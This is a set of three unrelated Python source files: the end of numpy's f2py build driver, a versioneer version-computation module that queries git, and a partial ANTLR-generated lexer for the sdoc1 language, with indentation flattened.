include_dirs.extend(num_info.get('include_dirs',[]))
from numpy.distutils.core import setup,Extension
ext_args = {'name':modulename,'sources':sources,
'include_dirs': include_dirs,
'library_dirs': library_dirs,
'libraries': libraries,
'define_macros': define_macros,
'undef_macros': undef_macros,
'extra_objects': extra_objects,
'f2py_options': f2py_flags,
}
if sysinfo_flags:
from numpy.distutils.misc_util import dict_append
for n in sysinfo_flags:
i = get_info(n)
if not i:
outmess('No %s resources found in system'\
' (try `f2py --help-link`)\n' % (`n`))
dict_append(ext_args,**i)
ext = Extension(**ext_args)
sys.argv = [sys.argv[0]] + setup_flags
sys.argv.extend(['build',
'--build-temp',build_dir,
'--build-base',build_dir,
'--build-platlib','.'])
if fc_flags:
sys.argv.extend(['config_fc']+fc_flags)
if flib_flags:
sys.argv.extend(['build_ext']+flib_flags)
setup(ext_modules = [ext])
if remove_build_dir and os.path.exists(build_dir):
import shutil
outmess('Removing build directory %s\n'%(build_dir))
shutil.rmtree(build_dir)
def main():
if '--help-link' in sys.argv[1:]:
sys.argv.remove('--help-link')
from numpy.distutils.system_info import show_all
show_all()
return
if '-c' in sys.argv[1:]:
run_compile()
else:
run_main(sys.argv[1:])
#if __name__ == "__main__":
# main()
# EOF
|
|
# This file helps to compute a version number in source trees obtained from
# git-archive tarball (such as those provided by githubs download-from-tag
# feature). Distribution tarballs (built by setup.py sdist) and build
# directories (produced by setup.py build) will contain a much shorter file
# that just contains the computed version number.
# This file is released into the public domain. Generated by
# versioneer-0.15 (https://github.com/warner/python-versioneer)
import errno
import os
import re
import subprocess
import sys
def get_keywords():
# these strings will be replaced by git during git-archive.
# setup.py/versioneer.py will grep for the variable names, so they must
# each be defined on a line of their own. _version.py will just call
# get_keywords().
git_refnames = "$Format:%d$"
git_full = "$Format:%H$"
keywords = {"refnames": git_refnames, "full": git_full}
return keywords
class VersioneerConfig:
pass
def get_config():
# these strings are filled in when 'setup.py versioneer' creates
# _version.py
cfg = VersioneerConfig()
cfg.VCS = "git"
cfg.style = "pep440"
cfg.tag_prefix = "v"
cfg.parentdir_prefix = "None"
cfg.versionfile_source = "xray_vision/_version.py"
cfg.verbose = False
return cfg
class NotThisMethod(Exception):
pass
LONG_VERSION_PY = {}
HANDLERS = {}
def register_vcs_handler(vcs, method): # decorator
def decorate(f):
if vcs not in HANDLERS:
HANDLERS[vcs] = {}
HANDLERS[vcs][method] = f
return f
return decorate
def run_command(commands, args, cwd=None, verbose=False, hide_stderr=False):
assert isinstance(commands, list)
p = None
for c in commands:
try:
dispcmd = str([c] + args)
# remember shell=False, so use git.cmd on windows, not just git
p = subprocess.Popen([c] + args, cwd=cwd, stdout=subprocess.PIPE,
stderr=(subprocess.PIPE if hide_stderr
else None))
break
except EnvironmentError:
e = sys.exc_info()[1]
if e.errno == errno.ENOENT:
continue
if verbose:
print("unable to run %s" % dispcmd)
print(e)
return None
else:
if verbose:
print("unable to find command, tried %s" % (commands,))
return None
stdout = p.communicate()[0].strip()
if sys.version_info[0] >= 3:
stdout = stdout.decode()
if p.returncode != 0:
if verbose:
print("unable to run %s (error)" % dispcmd)
return None
return stdout
def versions_from_parentdir(parentdir_prefix, root, verbose):
# Source tarballs conventionally unpack into a directory that includes
# both the project name and a version string.
dirname = os.path.basename(root)
if not dirname.startswith(parentdir_prefix):
if verbose:
print("guessing rootdir is '%s', but '%s' doesn't start with "
"prefix '%s'" % (root, dirname, parentdir_prefix))
raise NotThisMethod("rootdir doesn't start with parentdir_prefix")
return {"version": dirname[len(parentdir_prefix):],
"full-revisionid": None,
"dirty": False, "error": None}
@register_vcs_handler("git", "get_keywords")
def git_get_keywords(versionfile_abs):
# the code embedded in _version.py can just fetch the value of these
# keywords. When used from setup.py, we don't want to import _version.py,
# so we do it with a regexp instead. This function is not used from
# _version.py.
keywords = {}
try:
f = open(versionfile_abs, "r")
for line in f.readlines():
if line.strip().startswith("git_refnames ="):
mo = re.search(r'=\s*"(.*)"', line)
if mo:
keywords["refnames"] = mo.group(1)
if line.strip().startswith("git_full ="):
mo = re.search(r'=\s*"(.*)"', line)
if mo:
keywords["full"] = mo.group(1)
f.close()
except EnvironmentError:
pass
return keywords
@register_vcs_handler("git", "keywords")
def git_versions_from_keywords(keywords, tag_prefix, verbose):
if not keywords:
raise NotThisMethod("no keywords at all, weird")
refnames = keywords["refnames"].strip()
if refnames.startswith("$Format"):
if verbose:
print("keywords are unexpanded, not using")
raise NotThisMethod("unexpanded keywords, not a git-archive tarball")
refs = set([r.strip() for r in refnames.strip("()").split(",")])
# starting in git-1.8.3, tags are listed as "tag: foo-1.0" instead of
# just "foo-1.0". If we see a "tag: " prefix, prefer those.
TAG = "tag: "
tags = set([r[len(TAG):] for r in refs if r.startswith(TAG)])
if not tags:
# Either we're using git < 1.8.3, or there really are no tags. We use
# a heuristic: assume all version tags have a digit. The old git %d
# expansion behaves like git log --decorate=short and strips out the
# refs/heads/ and refs/tags/ prefixes that would let us distinguish
# between branches and tags. By ignoring refnames without digits, we
# filter out many common branch names like "release" and
# "stabilization", as well as "HEAD" and "master".
tags = set([r for r in refs if re.search(r'\d', r)])
if verbose:
print("discarding '%s', no digits" % ",".join(refs-tags))
if verbose:
print("likely tags: %s" % ",".join(sorted(tags)))
for ref in sorted(tags):
# sorting will prefer e.g. "2.0" over "2.0rc1"
if ref.startswith(tag_prefix):
r = ref[len(tag_prefix):]
if verbose:
print("picking %s" % r)
return {"version": r,
"full-revisionid": keywords["full"].strip(),
"dirty": False, "error": None
}
# no suitable tags, so version is "0+unknown", but full hex is still there
if verbose:
print("no suitable tags, using unknown + full revision id")
return {"version": "0+unknown",
"full-revisionid": keywords["full"].strip(),
"dirty": False, "error": "no suitable tags"}
@register_vcs_handler("git", "pieces_from_vcs")
def git_pieces_from_vcs(tag_prefix, root, verbose, run_command=run_command):
# this runs 'git' from the root of the source tree. This only gets called
# if the git-archive 'subst' keywords were *not* expanded, and
# _version.py hasn't already been rewritten with a short version string,
# meaning we're inside a checked out source tree.
if not os.path.exists(os.path.join(root, ".git")):
if verbose:
print("no .git in %s" % root)
raise NotThisMethod("no .git directory")
GITS = ["git"]
if sys.platform == "win32":
GITS = ["git.cmd", "git.exe"]
# if there is a tag, this yields TAG-NUM-gHEX[-dirty]
# if there are no tags, this yields HEX[-dirty] (no NUM)
describe_out = run_command(GITS, ["describe", "--tags", "--dirty",
"--always", "--long"],
cwd=root)
# --long was added in git-1.5.5
if describe_out is None:
raise NotThisMethod("'git describe' failed")
describe_out = describe_out.strip()
full_out = run_command(GITS, ["rev-parse", "HEAD"], cwd=root)
if full_out is None:
raise NotThisMethod("'git rev-parse' failed")
full_out = full_out.strip()
pieces = {}
pieces["long"] = full_out
pieces["short"] = full_out[:7] # maybe improved later
pieces["error"] = None
# parse describe_out. It will be like TAG-NUM-gHEX[-dirty] or HEX[-dirty]
# TAG might have hyphens.
git_describe = describe_out
# look for -dirty suffix
dirty = git_describe.endswith("-dirty")
pieces["dirty"] = dirty
if dirty:
git_describe = git_describe[:git_describe.rindex("-dirty")]
# now we have TAG-NUM-gHEX or HEX
if "-" in git_describe:
# TAG-NUM-gHEX
mo = re.search(r'^(.+)-(\d+)-g([0-9a-f]+)$', git_describe)
if not mo:
# unparseable. Maybe git-describe is misbehaving?
pieces["error"] = ("unable to parse git-describe output: '%s'"
% describe_out)
return pieces
# tag
full_tag = mo.group(1)
if not full_tag.startswith(tag_prefix):
if verbose:
fmt = "tag '%s' doesn't start with prefix '%s'"
print(fmt % (full_tag, tag_prefix))
pieces["error"] = ("tag '%s' doesn't start with prefix '%s'"
% (full_tag, tag_prefix))
return pieces
pieces["closest-tag"] = full_tag[len(tag_prefix):]
# distance: number of commits since tag
pieces["distance"] = int(mo.group(2))
# commit: short hex revision ID
pieces["short"] = mo.group(3)
else:
# HEX: no tags
pieces["closest-tag"] = None
count_out = run_command(GITS, ["rev-list", "HEAD", "--count"],
cwd=root)
pieces["distance"] = int(count_out) # total number of commits
return pieces
def plus_or_dot(pieces):
if "+" in pieces.get("closest-tag", ""):
return "."
return "+"
def render_pep440(pieces):
# now build up version string, with post-release "local version
# identifier". Our goal: TAG[+DISTANCE.gHEX[.dirty]] . Note that if you
# get a tagged build and then dirty it, you'll get TAG+0.gHEX.dirty
# exceptions:
# 1: no tags. git_describe was just HEX. 0+untagged.DISTANCE.gHEX[.dirty]
if pieces["closest-tag"]:
rendered = pieces["closest-tag"]
if pieces["distance"] or pieces["dirty"]:
rendered += plus_or_dot(pieces)
rendered += "%d.g%s" % (pieces["distance"], pieces["short"])
if pieces["dirty"]:
rendered += ".dirty"
else:
# exception #1
rendered = "0+untagged.%d.g%s" % (pieces["distance"],
pieces["short"])
if pieces["dirty"]:
rendered += ".dirty"
return rendered
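# Example: pieces {"closest-tag": "1.2", "distance": 3, "short": "abc1234",
# "dirty": True} render as "1.2+3.gabc1234.dirty"; a clean checkout exactly
# at the tag renders as just "1.2".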
def render_pep440_pre(pieces):
# TAG[.post.devDISTANCE] . No -dirty
# exceptions:
# 1: no tags. 0.post.devDISTANCE
if pieces["closest-tag"]:
rendered = pieces["closest-tag"]
if pieces["distance"]:
rendered += ".post.dev%d" % pieces["distance"]
else:
# exception #1
rendered = "0.post.dev%d" % pieces["distance"]
return rendered
def render_pep440_post(pieces):
# TAG[.postDISTANCE[.dev0]+gHEX] . The ".dev0" means dirty. Note that
# .dev0 sorts backwards (a dirty tree will appear "older" than the
# corresponding clean one), but you shouldn't be releasing software with
# -dirty anyways.
# exceptions:
# 1: no tags. 0.postDISTANCE[.dev0]
if pieces["closest-tag"]:
rendered = pieces["closest-tag"]
if pieces["distance"] or pieces["dirty"]:
rendered += ".post%d" % pieces["distance"]
if pieces["dirty"]:
rendered += ".dev0"
rendered += plus_or_dot(pieces)
rendered += "g%s" % pieces["short"]
else:
# exception #1
rendered = "0.post%d" % pieces["distance"]
if pieces["dirty"]:
rendered += ".dev0"
rendered += "+g%s" % pieces["short"]
return rendered
def render_pep440_old(pieces):
# TAG[.postDISTANCE[.dev0]] . The ".dev0" means dirty.
# exceptions:
# 1: no tags. 0.postDISTANCE[.dev0]
if pieces["closest-tag"]:
rendered = pieces["closest-tag"]
if pieces["distance"] or pieces["dirty"]:
rendered += ".post%d" % pieces["distance"]
if pieces["dirty"]:
rendered += ".dev0"
else:
# exception #1
rendered = "0.post%d" % pieces["distance"]
if pieces["dirty"]:
rendered += ".dev0"
return rendered
def render_git_describe(pieces):
# TAG[-DISTANCE-gHEX][-dirty], like 'git describe --tags --dirty
# --always'
# exceptions:
# 1: no tags. HEX[-dirty] (note: no 'g' prefix)
if pieces["closest-tag"]:
rendered = pieces["closest-tag"]
if pieces["distance"]:
rendered += "-%d-g%s" % (pieces["distance"], pieces["short"])
else:
# exception #1
rendered = pieces["short"]
if pieces["dirty"]:
rendered += "-dirty"
return rendered
def render_git_describe_long(pieces):
# TAG-DISTANCE-gHEX[-dirty], like 'git describe --tags --dirty
# --always -long'. The distance/hash is unconditional.
# exceptions:
# 1: no tags. HEX[-dirty] (note: no 'g' prefix)
if pieces["closest-tag"]:
rendered = pieces["closest-tag"]
rendered += "-%d-g%s" % (pieces["distance"], pieces["short"])
else:
# exception #1
rendered = pieces["short"]
if pieces["dirty"]:
rendered += "-dirty"
return rendered
def render(pieces, style):
if pieces["error"]:
return {"version": "unknown",
"full-revisionid": pieces.get("long"),
"dirty": None,
"error": pieces["error"]}
if not style or style == "default":
style = "pep440" # the default
if style == "pep440":
rendered = render_pep440(pieces)
elif style == "pep440-pre":
rendered = render_pep440_pre(pieces)
elif style == "pep440-post":
rendered = render_pep440_post(pieces)
elif style == "pep440-old":
rendered = render_pep440_old(pieces)
elif style == "git-describe":
rendered = render_git_describe(pieces)
elif style == "git-describe-long":
rendered = render_git_describe_long(pieces)
else:
raise ValueError("unknown style '%s'" % style)
return {"version": rendered, "full-revisionid": pieces["long"],
"dirty": pieces["dirty"], "error": None}
def get_versions():
# I am in _version.py, which lives at ROOT/VERSIONFILE_SOURCE. If we have
# __file__, we can work backwards from there to the root. Some
# py2exe/bbfreeze/non-CPython implementations don't do __file__, in which
# case we can only use expanded keywords.
cfg = get_config()
verbose = cfg.verbose
try:
return git_versions_from_keywords(get_keywords(), cfg.tag_prefix,
verbose)
except NotThisMethod:
pass
try:
root = os.path.realpath(__file__)
# versionfile_source is the relative path from the top of the source
# tree (where the .git directory might live) to this file. Invert
# this to find the root from __file__.
for i in cfg.versionfile_source.split('/'):
root = os.path.dirname(root)
except NameError:
return {"version": "0+unknown", "full-revisionid": None,
"dirty": None,
"error": "unable to find root of source tree"}
try:
pieces = git_pieces_from_vcs(cfg.tag_prefix, root, verbose)
return render(pieces, cfg.style)
except NotThisMethod:
pass
try:
if cfg.parentdir_prefix:
return versions_from_parentdir(cfg.parentdir_prefix, root, verbose)
except NotThisMethod:
pass
return {"version": "0+unknown", "full-revisionid": None,
"dirty": None,
"error": "unable to compute version"}
|
|
# Generated from sdoc/antlr/sdoc1Lexer.g4 by ANTLR 4.5.3
from antlr4 import *
from io import StringIO
def serializedATN():
with StringIO() as buf:
buf.write("\3\u0430\ud6d1\u8206\uad2d\u4417\uaef1\u8d80\uaadd\2*")
buf.write("\u013d\b\1\b\1\b\1\4\2\t\2\4\3\t\3\4\4\t\4\4\5\t\5\4\6")
buf.write("\t\6\4\7\t\7\4\b\t\b\4\t\t\t\4\n\t\n\4\13\t\13\4\f\t\f")
buf.write("\4\r\t\r\4\16\t\16\4\17\t\17\4\20\t\20\4\21\t\21\4\22")
buf.write("\t\22\4\23\t\23\4\24\t\24\4\25\t\25\4\26\t\26\4\27\t\27")
buf.write("\4\30\t\30\4\31\t\31\4\32\t\32\4\33\t\33\4\34\t\34\4\35")
buf.write("\t\35\4\36\t\36\4\37\t\37\4 \t \4!\t!\4\"\t\"\4#\t#\4")
buf.write("$\t$\4%\t%\4&\t&\4\'\t\'\4(\t(\4)\t)\4*\t*\4+\t+\4,\t")
buf.write(",\3\2\6\2]\n\2\r\2\16\2^\3\2\3\2\5\2c\n\2\3\3\3\3\7\3")
buf.write("g\n\3\f\3\16\3j\13\3\3\3\3\3\3\4\3\4\3\4\3\4\3\4\3\4\3")
buf.write("\4\3\4\3\4\3\5\3\5\3\5\3\5\3\5\3\5\3\5\3\5\3\5\3\6\3\6")
buf.write("\3\6\3\6\3\6\3\6\3\6\3\6\3\7\3\7\3\7\3\7\3\7\3\7\3\b\3")
buf.write("\b\3\b\3\b\3\b\3\b\3\b\3\t\3\t\3\t\3\t\3\t\3\t\3\t\3\t")
buf.write("\3\t\3\n\3\n\3\n\3\n\3\n\3\n\3\n\3\n\3\n\3\n\3\n\3\n\3")
buf.write("\n\3\n\3\13\3\13\3\13\3\13\3\13\3\13\3\f\3\f\3\f\3\f\3")
buf.write("\f\3\f\3\f\3\f\3\f\3\f\3\f\3\r\3\r\3\r\3\r\3\r\3\r\3\r")
buf.write("\3\r\3\r\3\r\3\16\3\16\3\16\3\16\3\16\3\16\3\16\3\16\3")
buf.write("\16\3\16\3\16\3\16\3\16\3\16\3\17\3\17\6\17\u00d7\n\17")
buf.write("\r\17\16\17\u00d8\3\20\3\20\3\21\3\21\3\21\3\21\3\22\3")
buf.write("\22\3\22\6\22\u00e4\n\22\r\22\16\22\u00e5\3\23\3\23\3")
buf.write("\24\3\24\3\24\3\24\3\25\6\25\u00ef\n\25\r\25\16\25\u00f0")
buf.write("\3\25\3\25\3\26\3\26\3\27\3\27\3\30\3\30\3\31\3\31\3\32")
buf.write("\3\32\3\33\3\33\3\34\3\34\3\35\3\35\3\36\3\36\3\36\3\37")
buf.write("\3\37\3 \3 \3 \3!\3!\3!\3\"\3\"\3\"\3#\3#\3$\3$\3$\3%")
buf.write("\3%\3%\3&\3&\3\'\3\'\3\'\7\'\u0120\n\'\f\'\16\'\u0123")
buf.write("\13\'\3(\6(\u0126\n(\r(\16(\u0127\3)\3)\3*\3*\3+\3+\3")
buf.write("+\3+\5+\u0132\n+\3,\3,\3,\7,\u0137\n,\f,\16,\u013a\13")
buf.write(",\3,\3,\3\u0138\2-\5\3\7\4\t\5\13\6\r\7\17\b\21\t\23\n")
buf.write("\25\13\27\f\31\r\33\16\35\17\37\20!\21#\22%\23\'\24)\25")
buf.write("+\26-\27/\30\61\31\63\32\65\33\67\349\35;\36=\37? A!C")
buf.write("\"E#G$I%K&M\'O(Q)S\2U\2W\2Y*\5\2\3\4\n\3\2^^\4\2\f\f\17")
buf.write("\17\4\2aac|\5\2^^}}\177\177\5\2\13\f\17\17\"\"\5\2C\\")
buf.write("aac|\3\2\62;\3\2))\u0144\2\5\3\2\2\2\2\7\3\2\2\2\2\t\3")
buf.write("\2\2\2\2\13\3\2\2\2\2\r\3\2\2\2\2\17\3\2\2\2\2\21\3\2")
buf.write("\2\2\2\23\3\2\2\2\2\25\3\2\2\2\2\27\3\2\2\2\2\31\3\2\2")
buf.write("\2\2\33\3\2\2\2\2\35\3\2\2\2\2\37\3\2\2\2\3!\3\2\2\2\3")
buf.write("#\3\2\2\2\3%\3\2\2\2\4\'\3\2\2\2\4)\3\2\2\2\4+\3\2\2\2")
buf.write("\4-\3\2\2\2\4/\3\2\2\2\4\61\3\2\2\2\4\63\3\2\2\2\4\65")
buf.write("\3\2\2\2\4\67\3\2\2\2\49\3\2\2\2\4;\3\2\2\2\4=\3\2\2\2")
buf.write("\4?\3\2\2\2\4A\3\2\2\2\4C\3\2\2\2\4E\3\2\2\2\4G\3\2\2")
buf.write("\2\4I\3\2\2\2\4K\3\2\2\2\4M\3\2\2\2\4O\3\2\2\2\4Q\3\2")
buf.write("\2\2\4Y\3\2\2\2\5b\3\2\2\2\7d\3\2\2\2\tm\3\2\2\2\13v\3")
buf.write("\2\2\2\r\177\3\2\2\2\17\u0087\3\2\2\2\21\u008d\3\2\2\2")
buf.write("\23\u0094\3\2\2\2\25\u009d\3\2\2\2\27\u00ab\3\2\2\2\31")
buf.write("\u00b1\3\2\2\2\33\u00bc\3\2\2\2\35\u00c6\3\2\2\2\37\u00d4")
buf.write("\3\2\2\2!\u00da\3\2\2\2#\u00dc\3\2\2\2%\u00e3\3\2\2\2")
buf.write("\'\u00e7\3\2\2\2)\u00e9\3\2\2\2+\u00ee\3\2\2\2-\u00f4")
buf.write("\3\2\2\2/\u00f6\3\2\2\2\61\u00f8\3\2\2\2\63\u00fa\3\2")
buf.write("\2\2\65\u00fc\3\2\2\2\67\u00fe\3\2\2\29\u0100\3\2\2\2")
buf.write(";\u0102\3\2\2\2=\u0104\3\2\2\2?\u0107\3\2\2\2A\u0109\3")
buf.write("\2\2\2C\u010c\3\2\2\2E\u010f\3\2\2\2G\u0112\3\2\2\2I\u0114")
buf.write("\3\2\2\2K\u0117\3\2\2\2M\u011a\3\2\2\2O\u011c\3\2\2\2")
buf.write("Q\u0125\3\2\2\2S\u0129\3\2\2\2U\u012b\3\2\2\2W\u0131\3")
buf.write("\2\2\2Y\u0133\3\2\2\2[]\n\2\2\2\\[\3\2\2\2]^\3\2\2\2^")
buf.write("\\\3\2\2\2^_\3\2\2\2_c\3\2\2\2`a\7^\2\2ac\7^\2\2b\\\3")
buf.write("\2\2\2b`\3\2\2\2c\6\3\2\2\2dh\5\t\4\2eg\n\3\2\2fe\3\2")
buf.write("\2\2gj\3\2\2\2hf\3\2\2\2hi\3\2\2\2ik\3\2\2\2jh\3\2\2\2")
buf.write("kl\t\3\2\2l\b\3\2\2\2mn\7^\2\2no\7e\2\2op\7q\2\2pq\7o")
buf.write("\2\2qr\7o\2\2rs\7g\2\2st\7p\2\2tu\7v\2\2u\n\3\2\2\2vw")
buf.write("\7^\2\2wx\7f\2\2xy\7g\2\2yz\7d\2\2z{\7w\2\2{|\7i\2\2|")
buf.write("}\3\2\2\2}~\b\5\2\2~\f\3\2\2\2\177\u0080\7^\2\2\u0080")
buf.write("\u0081\7g\2\2\u0081\u0082\7n\2\2\u0082\u0083\7k\2\2\u0083")
buf.write("\u0084\7h\2\2\u0084\u0085\3\2\2\2\u0085\u0086\b\6\2\2")
buf.write("\u0086\16\3\2\2\2\u0087\u0088\7^\2\2\u0088\u0089\7g\2")
buf.write("\2\u0089\u008a\7n\2\2\u008a\u008b\7u\2\2\u008b\u008c\7")
buf.write("g\2\2\u008c\20\3\2\2\2\u008d\u008e\7^\2\2\u008e\u008f")
buf.write("\7g\2\2\u008f\u0090\7p\2\2\u0090\u0091\7f\2\2\u0091\u0092")
buf.write("\7k\2\2\u0092\u0093\7h\2\2\u0093\22\3\2\2\2\u0094\u0095")
buf.write("\7^\2\2\u0095\u0096\7g\2\2\u0096\u0097\7t\2\2\u0097\u0098")
buf.write("\7t\2\2\u0098\u0099\7q\2\2\u0099\u009a\7t\2\2\u009a\u009b")
buf.write("\3\2\2\2\u009b\u009c\b\t\3\2\u009c\24\3\2\2\2\u009d\u009e")
buf.write("\7^\2\2\u009e\u009f\7g\2\2\u009f\u00a0\7z\2\2\u00a0\u00a1")
buf.write("\7r\2\2\u00a1\u00a2\7t\2\2\u00a2\u00a3\7g\2\2\u00a3\u00a4")
buf.write("\7u\2\2\u00a4\u00a5\7u\2\2\u00a5\u00a6\7k\2\2\u00a6\u00a7")
buf.write("\7q\2\2\u00a7\u00a8\7p\2\2\u00a8\u00a9\3\2\2\2\u00a9\u00aa")
buf.write("\b\n\2\2\u00aa\26\3\2\2\2\u00ab\u00ac\7^\2\2\u00ac\u00ad")
buf.write("\7k\2\2\u00ad\u00ae\7h\2\2\u00ae\u00af\3\2\2\2\u00af\u00b0")
buf.write("\b\13\2\2\u00b0\30\3\2\2\2\u00b1\u00b2\7^\2\2\u00b2\u00b3")
buf.write("\7k\2\2\u00b3\u00b4\7p\2\2\u00b4\u00b5\7e\2\2\u00b5\u00b6")
buf.write("\7n\2\2\u00b6\u00b7\7w\2\2\u00b7\u00b8\7f\2\2\u00b8\u00b9")
buf.write("\7g\2\2\u00b9\u00ba\3\2\2\2\u00ba\u00bb\b\f\3\2\u00bb")
buf.write("\32\3\2\2\2\u00bc\u00bd\7^\2\2\u00bd\u00be\7p\2\2\u00be")
buf.write("\u00bf\7q\2\2\u00bf\u00c0\7v\2\2\u00c0\u00c1\7k\2\2\u00c1")
buf.write("\u00c2\7e\2\2\u00c2\u00c3\7g\2\2\u00c3\u00c4\3\2\2\2\u00c4")
buf.write("\u00c5\b\r\3\2\u00c5\34\3\2\2\2\u00c6\u00c7\7^\2\2\u00c7")
buf.write("\u00c8\7u\2\2\u00c8\u00c9\7w\2\2\u00c9\u00ca\7d\2\2\u00ca")
buf.write("\u00cb\7u\2\2\u00cb\u00cc\7v\2\2\u00cc\u00cd\7k\2\2\u00cd")
buf.write("\u00ce\7v\2\2\u00ce\u00cf\7w\2\2\u00cf\u00d0\7v\2\2\u00d0")
buf.write("\u00d1\7g\2\2\u00d1\u00d2\3\2\2\2\u00d2\u00d3\b\16\2\2")
buf.write("\u00d3\36\3\2\2\2\u00d4\u00d6\7^\2\2\u00d5\u00d7\t\4\2")
buf.write("\2\u00d6\u00d5\3\2\2\2\u00d7\u00d8\3\2\2\2\u00d8\u00d6")
buf.write("\3\2\2\2\u00d8\u00d9\3\2\2\2\u00d9 \3\2\2\2\u00da\u00db")
buf.write("\7}\2\2\u00db\"\3\2\2\2\u00dc\u00dd\7\177\2\2\u00dd\u00de")
buf.write("\3\2\2\2\u00de\u00df\b\21\4\2\u00df$\3\2\2\2\u00e0\u00e4")
buf.write("\n\5\2\2\u00e1\u00e2\7^\2\2\u00e2\u00e4\13\2\2\2\u00e3")
buf.write("\u00e0\3\2\2\2\u00e3\u00e1\3\2\2\2\u00e4\u00e5\3\2\2\2")
buf.write("\u00e5\u00e3\3\2\2\2\u00e5\u00e6\3\2\2\2\u00e6&\3\2\2")
buf.write("\2\u00e7\u00e8\7}\2\2\u00e8(\3\2\2\2\u00e9\u00ea\7\177")
buf.write("\2\2\u00ea\u00eb\3\2\2\2\u00eb\u00ec\b\24\4\2\u00ec*\3")
buf.write("\2\2\2\u00ed\u00ef\t\6\2\2\u00ee\u00ed\3\2\2\2\u00ef\u00f0")
buf.write("\3\2\2\2\u00f0\u00ee\3\2\2\2\u00f0\u00f1\3\2\2\2\u00f1")
buf.write("\u00f2\3\2\2\2\u00f2\u00f3\b\25\5\2\u00f3,\3\2\2\2\u00f4")
buf.write("\u00f5\7*\2\2\u00f5.\3\2\2\2\u00f6\u00f7\7+\2\2\u00f7")
buf.write("\60\3\2\2\2\u00f8\u00f9\7]\2\2\u00f9\62\3\2\2\2\u00fa")
buf.write("\u00fb\7_\2\2\u00fb\64\3\2\2\2\u00fc\u00fd\7,\2\2\u00fd")
buf.write("\66\3\2\2\2\u00fe\u00ff\7\61\2\2\u00ff8\3\2\2\2\u0100")
buf.write("\u0101\7-\2\2\u0101:\3\2\2\2\u0102\u0103\7/\2\2\u0103")
buf.write("<\3\2\2\2\u0104\u0105\7?\2\2\u0105\u0106\7?\2\2\u0106")
buf.write(">\3\2\2\2\u0107\u0108\7@\2\2\u0108@\3\2\2\2\u0109\u010a")
buf.write("\7@\2\2\u010a\u010b\7?\2\2\u010bB\3\2\2\2\u010c\u010d")
buf.write("\7(\2\2\u010d\u010e\7(\2\2\u010eD\3\2\2\2\u010f\u0110")
buf.write("\7~\2\2\u0110\u0111\7~\2\2\u0111F\3\2\2\2\u0112\u0113")
buf.write("\7>\2\2\u0113H\3\2\2\2\u0114\u0115\7>\2\2\u0115\u0116")
buf.write("\7?\2\2\u0116J\3\2\2\2\u0117\u0118\7#\2\2\u0118\u0119")
buf.write("\7?\2\2\u0119L\3\2\2\2\u011a\u011b\7?\2\2\u011bN\3\2\2")
buf.write("\2\u011c\u0121\5S)\2\u011d\u0120\5S)\2\u011e\u0120\5U")
buf.write("*\2\u011f\u011d\3\2\2\2\u011f\u011e\3\2\2\2\u0120\u0123")
buf.write("\3\2\2\2\u0121\u011f\3\2\2\2\u0121\u0122\3\2\2\2\u0122")
buf.write("P\3\2\2\2\u0123\u0121\3\2\2\2\u0124\u0126\5U*\2\u0125")
buf.write("\u0124\3\2\2\2\u0126\u0127\3\2\2\2\u0127\u0125\3\2\2\2")
buf.write("\u0127\u0128\3\2\2\2\u0128R\3\2\2\2\u0129\u012a\t\7\2")
buf.write("\2\u012aT\3\2\2\2\u012b\u012c\t\b\2\2\u012cV\3\2\2\2\u012d")
buf.write("\u012e\7^\2\2\u012e\u0132\7^\2\2\u012f\u0130\7^\2\2\u0130")
buf.write("\u0132\7)\2\2\u0131\u012d\3\2\2\2\u0131\u012f\3\2\2\2")
buf.write("\u0132X\3\2\2\2\u0133\u0138\7)\2\2\u0134\u0137\5W+\2\u0135")
buf.write("\u0137\n\t\2\2\u0136\u0134\3\2\2\2\u0136\u0135\3\2\2\2")
buf.write("\u0137\u013a\3\2\2\2\u0138\u0139\3\2\2\2\u0138\u0136\3")
buf.write("\2\2\2\u0139\u013b\3\2\2\2\u013a\u0138\3\2\2\2\u013b\u013c")
buf.write("\7)\2\2\u013cZ\3\2\2\2\22\2\3\4^bh\u00d8\u00e3\u00e5\u00f0")
buf.write("\u011f\u0121\u0127\u0131\u0136\u0138\6\4\4\2\4\3\2\4\2")
buf.write("\2\2\3\2")
return buf.getvalue()
class sdoc1Lexer(Lexer):
atn = ATNDeserializer().deserialize(serializedATN())
decisionsToDFA = [ DFA(ds, i) for i, ds in enumerate(atn.decisionToState) ]
MODE_SIMPLE = 1
MODE_EXPR = 2
TEXT = 1
LINE_COMMENT = 2
COMMENT = 3
DEBUG = 4
ELIF = 5
ELSE = 6
ENDIF = 7
ERROR = 8
EXPRESSION = 9
IF = 10
INCLUDE = 11
NOTICE = 12
SUBSTITUTE = 13
SDOC2_COMMAND = 14
SIMPLE_OBRACE = 15
SIMPLE_CBRACE = 16
SIMPLE_ARG = 17
EXPR_OBRACE = 18
EXPR_CBRACE = 19
EXPR_WS = 20
EXPR_LEFT_PAREN = 21
EXPR_RIGHT_PAREN = 22
EXPR_LEFT_BRACKET = 23
EXPR_RIGHT_BRACKET = 24
EXPR_MULT = 25
EXPR_DIV = 26
EXPR_ADD = 27
EXPR_MINUS = 28
EXPR_EQUAL = 29
EXPR_GT = 30
EXPR_GTE = 31
EXPR_LOGICAL_AND = 32
EXPR_LOGICAL_OR = 33
EXPR_LT = 34
EXPR_LTE = 35
EXPR_NOT_EQUAL = 36
EXPR_ASSIGN = 37
EXPR_IDENTIFIER = 38
EXPR_INTEGER_CONSTANT = 39
EXPR_STRING_CONSTANT = 40
modeNames = [ "DEFAULT_MODE", "MODE_SIMPLE", "MODE_EXPR" ]
literalNames = [ "<INVALID>",
"'\\comment'", "'\\debug'", "'\\elif'", "'\\else'", "'\\endif'",
"'\\error'", "'\\expression'", "'\\if'", "'\\include'", "'\\notice'",
"'\\substitute'", "'('", "')'", "'['", "']'", "'*'", "'/'",
"'+'", "'-'", "'=='", "'>'", "'>='", "'&&'", "'||'", "'<'",
"'<='", "'!='", "'='" ]
symbolicNames = [ "<INVALID>",
"TEXT", "LINE_COMMENT", "COMMENT", "DEBUG", "ELIF", "ELSE",
"ENDIF", "ERROR", "EXPRESSION", "IF", "INCLUDE", "NOTICE", "SUBSTITUTE",
"SDOC2_COMMAND", "SIMPLE_OBRACE", "SIMPLE_CBRACE", "SIMPLE_ARG",
"EXPR_OBRACE", "EXPR_CBRACE", "EXPR_WS", "EXPR_LEFT_PAREN",
"EXPR_RIGHT_PAREN", "EXPR_LEFT_BRACKET", "EXPR_RIGHT_BRACKET",
"EXPR_MULT", "EXPR_DIV", "EXPR_ADD", "EXPR_MINUS", "EXPR_EQUAL",
"EXPR_GT", "EXPR_GTE", "EXPR_LOGICAL_AND", "EXPR_LOGICAL_OR",
